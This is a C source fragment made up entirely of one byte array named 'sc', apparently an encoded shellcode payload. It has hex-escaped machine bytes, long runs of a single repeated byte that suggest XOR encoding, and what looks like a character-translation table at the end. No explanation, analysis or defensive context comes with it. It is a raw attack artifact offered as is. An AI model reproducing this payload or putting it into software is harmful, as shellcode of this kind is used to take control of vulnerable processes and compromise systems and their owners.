char sc[]=
"\x90\x64\xd0\x0c\xc0\xf0\xff\xff\xff\xfe\x18\xcf\x17\x11\x17\x22"
"\x17\x33\xc2\x19\x01\x01\x01\x02\xc2\x29\x01\x01\x01\x03\x17\x12"
"\x18\x41\x8b\x40\x10\x01\x17\xaa\x17\x22\xc0\xa1\xde\xad\xbe\xef"
"\x18\xbc\x1a\xb1\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xfc\x1a\xb4"
"\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xf6\x1a\xb1\x1b\xb4\x50\xd0"
"\xb0\x04\x50\xb0\xd0\x08\x18\xdb\x18\x3b\x1a\x34\x1a\x34\x18\x53"
"\x1b\x31\x1b\x31\x18\x41\x17\x11\x17\x22\x1a\x14\xb9\xf8\x10\x23"
"\x97\x2a\x20\x01\xa7\x1e\x06\x80\xa7\x44\xff\xf9\x17\x44\x58\xd4"
"\xb0\x04\x98\x64\xd0\x0c\x07\xf5\xde\xad\xbe\xef\xde\xad\xbe\xef"
"\xba\xc6\xfa\x26\xea\xda\xd5\xd5\xd5\xd4\x32\x25\xea\x6a\x2a\x2a"
"\x28\xfc\x7a\xfa\x6a\x2e\x32\xfe\x8d\xb2\x2a\x2b\x8d\xe2\x2a\x2e"
"\x8d\xde\x2a\x6c\xea\x1a\x2a\x2a\x2a\x22\xfd\x19\x1a\x2a\x1a\x2a"
"\x3d\x19\x2d\xd4\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a"
"\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a"
"\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a"
"\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\xea\x3a\xd5\xd5\xd5\xcc\xee\xc5"
"\x2a\x2a\x28\x8f\xc6\x12\x2a\x3d\x2a\x54\x31\x13\x31\x73\x8d\x16"
"\x2a\x2e\x8d\x76\x2a\x2e\x30\x1b\x30\x7b\xc6\x1f\x2a\x22\xaa\x5c"
"\x7a\x1a\x1a\x2a\x30\x16\x8d\xde\xd5\xd0\x8f\x70\xaa\x2a\x7a\x7a"
"\x7a\x2a\x2f\xc5\xee\xc7\x2a\x2a\x28\xa0\x2d\xd4\xee\xd7\x2a\x2a"
"\x28\xbe\x8d\xcf\xd5\x93\xea\x5a\x2a\x2a\x28\xa3\xee\x55\xd5\xd5"
"\xd5\x96\xea\x5a\x2a\x2a\x28\xab\xee\x55\xd5\xd5\xd5\x92\xea\x5a"
"\x2a\x2a\x28\x53\xee\x55\xd5\xd5\xd5\x9e\xea\x5a\x2a\x2a\x28\x5f"
"\xee\x55\xd5\xd5\xd5\x9a\xea\x5a\x2a\x2a\x28\xad\xee\x55\xd5\xd5"
"\xd5\x86\x8d\x12\x2a\x2c\x8d\x72\x2a\x22\x8d\xcf\xd5\x9d\xee\xd7"
"\x2a\x2a\x28\x47\x8d\xcf\xd5\xba\xea\x5a\x2a\x2a\x28\x5c\xee\x55"
"\xd5\xd5\xd5\xb9\xea\x5a\x2a\x2a\x28\x58\xee\x55\xd5\xd5\xd5\xa5"
"\xea\x5a\x2a\x2a\x28\x86\xee\x55\xd5\xd5\xd5\xa1\x8d\x12\x2a\x2e"
"\x8d\x72\x2a\x2c\x8d\xcf\xd5\xb0\x32\xd6\xee\x47\xd5\xd5\xd5\xa9"
"\xc6\x4d\x28\x06\x2a\x54\xee\xd7\x2a\x2a\x28\x61\xea\x5a\x2a\x2a"
"\x28\x7e\xee\x55\xd5\xd5\xd5\x5b\xea\x5a\x2a\x2a\x28\x1c\xee\x55"
"\xd5\xd5\xd5\x47\x8d\x12\x2a\x29\x8d\x72\x2a\x2f\x8d\xcf\xd5\x54"
"\xee\xd7\x2a\x2a\x28\x12\x8d\xcf\xd5\x7d\xea\x5a\x2a\x2a\x28\x17"
"\xee\x55\xd5\xd5\xd5\x70\xea\x5a\x2a\x2a\x28\x69\xee\x55\xd5\xd5"
"\xd5\x7c\xea\x5a\x2a\x2a\x28\x1f\xee\x55\xd5\xd5\xd5\x78\xea\x5a"
"\x2a\x2a\x28\x13\xee\x55\xd5\xd5\xd5\x64\x8d\x12\x2a\x2f\x8d\x72"
"\x2a\x2c\x8d\xcf\xd5\x71\x8d\xcf\x2b\x5c\xee\x75\x2a\x2a\x28\x7d"
"\xee\x45\x2a\x2a\x28\x7c\x8d\xcf\x2b\x44\xee\x75\x2a\x2a\x28\x79"
"\xee\x45\x2a\x2a\x28\x78\xee\xd7\x2a\x2a\x2b\xd1\x8d\xcf\xd5\x0e"
"\x8d\x12\x2a\x2b\x8d\x72\x2a\x29\x8d\xcf\xd5\x6a\xee\x07\xd5\xd5"
"\xd5\x0e\xc6\x0d\x2a\x52\x2a\x54\x6b\x0a\x2a\x23\xee\x77\x2a\x2a"
"\x28\x16\x32\x4f\x8d\xcf\x2b\x0e\xee\x77\x2a\x2a\x28\x1a\x32\x4f"
"\x8d\xcf\x2b\x34\x6b\x0a\x2a\x22\xee\x77\x2a\x2a\x28\x06\xea\x4b"
"\x2a\x2a\x2a\x2a\x8d\xcf\x2b\x3e\xee\x77\x2a\x2a\x28\x08\xea\x4b"
"\x2a\x2a\x2a\x2b\x8d\xcf\x2b\x26\xee\x77\x2a\x2a\x28\x30\xea\x4b"
"\x2a\x2a\x2a\x28\x8d\xcf\x2b\x2e\x6b\x0a\x2a\x23\xee\x77\x2a\x2a"
"\x28\x38\x32\x4f\x8d\xcf\x2a\xd6\xee\x77\x2a\x2a\x28\x20\x32\x4f"
"\x8d\xcf\x2a\xdc\xee\xd7\x2a\x2a\x2b\x9c\x8d\xcf\xd4\xf7\xea\x5a"
"\x2a\x2a\x2b\xf9\xee\x55\xd5\xd5\xd4\xca\x30\x56\xee\x55\xd5\xd5"
"\xd4\xf4\xea\x5a\x2a\x2a\x2b\xe5\xee\x55\xd5\xd5\xd4\xf0\x30\x56"
"\xee\x55\x2a\x2a\x2b\xe6\x30\x56\xee\x55\xd5\xd5\xd4\xfe\x30\x56"
"\xee\x55\x2a\x2a\x2b\xe2\x30\x56\xee\x55\xd5\xd5\xd4\xe4\xea\x5a"
"\x2a\x2a\x2b\xa3\xee\x55\xd5\xd5\xd4\xe0\xee\x55\xd5\xd5\xd4\xe3"
"\xee\x55\xd5\xd5\xd4\xe2\xee\x55\xd5\xd5\xd4\xed\xee\x55\xd5\xd5"
"\xd4\xec\x8d\x12\x2a\x21\x8d\x72\x2a\x27\x8d\xcf\xd4\xed\x8d\x2f"
"\x2b\x76\x6b\x0a\x2a\x23\xee\x77\x2a\x2a\x2b\xef\x32\x4f\x8d\xcf"
"\x2a\x85\xee\x77\x2a\x2a\x2b\x97\x32\x4f\x8d\xcf\x2a\x83\x6b\x0a"
"\x2a\x2e\xee\x77\x2a\x2a\x2b\xad\x8d\x42\x2a\x2d\x8d\xcf\x2a\x8a"
"\xee\x77\x2a\x2a\x2b\x86\x8d\x42\x2a\x2c\x8d\xcf\x2a\xb3\xea\x7a"
"\x2a\x2a\x2b\x53\xea\xaa\x2a\x2a\x2a\x26\x8d\xcf\x2a\x31\x8d\xcf"
"\x2a\xca\xea\x7a\x2a\x2a\x2b\x8b\x8d\xcf\x2a\x70\xea\x7a\x2a\x2a"
"\x2b\xbc\xea\xaa\xd5\xd5\xd5\xc4\x8d\xcf\x2a\x26\x8d\xcf\x2a\xd4"
"\xea\xca\xd5\xd5\xd5\xdc\xea\x7a\x2a\x2a\x2b\x77\x8d\xde\x2a\x62"
"\xee\xd7\x2a\x2a\x2b\x68\x32\x94\x8d\xcf\xd4\x74\xea\x0a\x2a\x2a"
"\x2b\x58\xfd\x29\x0a\x2a\x0a\x2a\xea\x0a\x2a\x2a\x2b\x4e\xfd\x25"
"\x0a\x2a\x0a\x2a\xee\x75\xd5\xd5\xd4\x72\xea\x5a\x2a\x2a\x2b\x71"
"\xee\x55\x2a\x2a\x2b\x7e\xea\x5a\x2a\x2a\x2b\x7b\xee\x55\xd5\xd5"
"\xd4\x64\xea\x5a\x2a\x2a\x2b\x25\xee\x55\xd5\xd5\xd4\x60\xea\x5a"
"\x2a\x2a\x2b\x6d\xee\x55\xd5\xd5\xd4\x6c\xea\x5a\x2a\x2a\x2b\x61"
"\xee\x55\xd5\xd5\xd4\x68\x8d\x12\x2a\x2c\x8d\x72\x2a\x2d\x8d\xcf"
"\xd4\x67\x32\xc1\x32\xd3\xee\x47\x2a\x2a\x2b\x17\xc6\x48\xca\x2a"
"\x2a\xd4\xc6\x42\xaa\x2a\xd5\xd4\x8d\x2f\x2a\xf2\xee\xd7\x2a\x2a"
"\x2a\xd4\x32\x94\x8d\xcf\xd4\x32\xee\x75\xd5\xd5\xd4\x34\xea\x5a"
"\x2a\x2a\x2b\x0b\xee\x55\x2a\x2a\x2b\x30\xea\x5a\x2a\x2a\x2b\x3d"
"\xee\x55\xd5\xd5\xd4\x3e\xea\x5a\x2a\x2a\x2a\xff\xee\x55\xd5\xd5"
"\xd4\x3a\xea\x5a\x2a\x2a\x2b\x3d\xee\x55\xd5\xd5\xd4\x26\x8d\x12"
"\x2a\x2f\x8d\x72\x2a\x2d\x8d\xcf\xd4\x33\x32\xc1\xee\x47\xd5\xd5"
"\xd4\x2e\x32\xdc\xc6\x42\x2a\x80\xd5\x54\x2d\xd4\xee\xd7\x2a\x2a"
"\x2a\xfa\x32\x94\x8d\xcf\xd7\xc2\xee\x75\x2a\x2a\x2a\xd4\xee\x05"
"\x2a\x2a\x2a\xd7\xee\x45\x2a\x2a\x2a\xd6\xea\x5a\x2a\x2a\x2a\xdf"
"\xee\x55\xd5\xd5\xd7\xc8\x30\x56\xee\x55\xd5\xd5\xd7\xca\x30\x56"
"\xee\x55\xd5\xd5\xd7\xf4\x8d\x12\x2a\x2e\x8d\x72\x2a\x2c\x8d\xcf"
"\xd7\xc7\x32\xc1\xee\x57\xd5\xd5\xd7\xfc\xc6\x52\x2a\x55\xd5\x54"
"\x2d\xd4\xee\xd7\x2a\x2a\x2a\x8d\x32\x94\x8d\xcf\xd7\x97\xea\x5a"
"\x2a\x2a\x2a\xf3\xee\x55\xd5\xd5\xd7\xea\x30\x56\xee\x55\xd5\xd5"
"\xd7\x94\x8d\x12\x2a\x29\x8d\x72\x2a\x2f\x8d\xcf\xd7\xe5\xee\x47"
"\xd5\xd5\xd7\x9d\x8d\xd2\x2a\x49\xc6\x42\x2a\x4a\xd5\x54\xee\x77"
"\x2a\x2a\x2a\xeb\xee\x47\x2a\x2a\x2a\xea\x32\xc1\x2d\xd4\xea\x3a"
"\x2a\x2a\x2a\x83\xee\x67\x2a\x2a\x2a\x84\x8d\xa2\x2a\x3f\xea\x0a"
"\x2a\x2a\x2a\xeb\x3d\x4c\xc9\x1a\x3a\x2a\x2a\x5c\xea\x11\x2a\x2a"
"\x2a\xd5\x33\x12\x8d\x5e\x2a\x22\x8d\x72\x2a\xaf\x68\x7a\x3a\x2a"
"\x8d\xde\x2a\x25\xc9\x7a\x0a\x2a\x2a\x5c\xea\x71\x2a\x2a\x2a\xd5"
"\x30\x43\x30\x03\x33\x1f\x8d\x5e\xd5\xdd\x68\x4a\x3a\x2a\x30\x33"
"\x31\x63\x8d\x5e\xd5\xf4\x2d\xd4\xee\x67\x2a\x2a\x2a\xae\xea\x3a"
"\x2a\x2a\x2a\x53\x8d\xa2\x2a\xaf\xea\x0a\x2a\x2a\x2a\xbe\x31\x03"
"\xc9\x1a\x3a\x2a\x2a\x5c\xea\x11\x2a\x2a\x2a\xd5\x33\x12\x8d\x5e"
"\x2a\x2c\x8d\x12\x2a\x4f\x8d\xde\x2a\x23\x30\x09\xc9\x1a\x0a\x2a"
"\x2a\x5c\xea\x11\x2a\x2a\x2a\xd5\x68\x1a\x3a\x2a\x30\x33\x31\x63"
"\x8d\x5e\xd5\xce\x2d\xd4\x3d\xd5\xea\x6a\x2a\x2a\x2a\x3a\x7a\xda"
"\x6a\x2a\x72\xfa\x6a\x2e\xb2\xc6\xfa\x26\xea\x6a\x2a\x2a\x2a\x2d"
"\x72\xda\x6a\x2a\x2d\xd4\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a"
"\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2b\x2a\x2a\x2a\x28\x2b\x79\x19\x96"
"\x2b\x79\x19\x8e\x2b\x79\x1d\x3a\x2b\x79\x1c\x1c\x2b\x79\x1c\x42"
"\x2b\x79\x1c\x0e\x2b\x79\x19\x34\x2b\x79\x19\xa0\x2b\x79\x18\x66"
"\x2b\x79\x19\x2c\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x3a\x2a\x2a\x2a\x2a"
"\x2a\x2a\x2a\x2a\x3a\x28\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a"
"\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2d\x4b\xa8\xa3\xbf\x4b\x88\xa2\x2a"
"\x2a\x2a\x2a\x2b\x2a\x2a\x2a\x28\x2a\x2a\x2a\x2a\x88\xa2\x2a\x2a"
"\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x3a"
"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
"\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a"
"\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a"
"\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x28\x28\x1a\x13\x2a\x2a\x2a\x2a"
"\x01\x02\x03\x9c\x09\x86\x7f\x97\x8d\x8e\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x9d\x0a\x08\x87\x18\x19\x92\x8f\x1c\x1d\x1e\x1f\x80"
"\x81\x82\x83\x84\x85\x17\x1b\x88\x89\x8a\x8b\x8c\x05\x06\x07\x90"
"\x91\x16\x93\x94\x95\x96\x04\x98\x99\x9a\x9b\x14\xff\x9e\x1a\x20"
"\xa0\xe2\xe4\xe0\xe1\xe3\xe5\xe7\xf1\xa2\x2e\x3c\x28\x2b\x7c\x26"
"\xe9\xea\xeb\xe8\xed\xee\xef\xec\xdf\x21\x24\x2a\x29\x3b\x5e\x2d"
"\x2f\xc2\xc4\xc0\xc1\xc3\xc5\xc7\xd1\xa6\x2c\x25\x5f\x3e\x3f\xf8"
"\xc9\xca\xcb\xc8\xcd\xce\xcf\xcc\x60\x3a\x23\x40\x27\x3d\x22\xd8"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\xab\xbb\xf0\xfd\xfe\xb1\xb0"
"\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\xaa\xba\xe6\xb8\xc6\xa4\xb5"
"\x7e\x73\x74\x75\x76\x77\x78\x79\x7a\xa1\xbf\xd0\x5b\xde\xae\xac"
"\xa3\xa5\xb7\xa9\xa7\xb6\xbc\xbd\xbe\xdd\xa8\xaf\x5d\xb4\xd7\x7b"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\xad\xf4\xf6\xf2\xf3\xf5\x7d"
"\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\xb9\xfb\xfc\xf9\xfa\xff\x5c"
"\xf7\x53\x54\x55\x56\x57\x58\x59\x5a\xb2\xd4\xd6\xd2\xd3\xd5\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\xb3\xdb\xdc\xd9\xda\x9f";
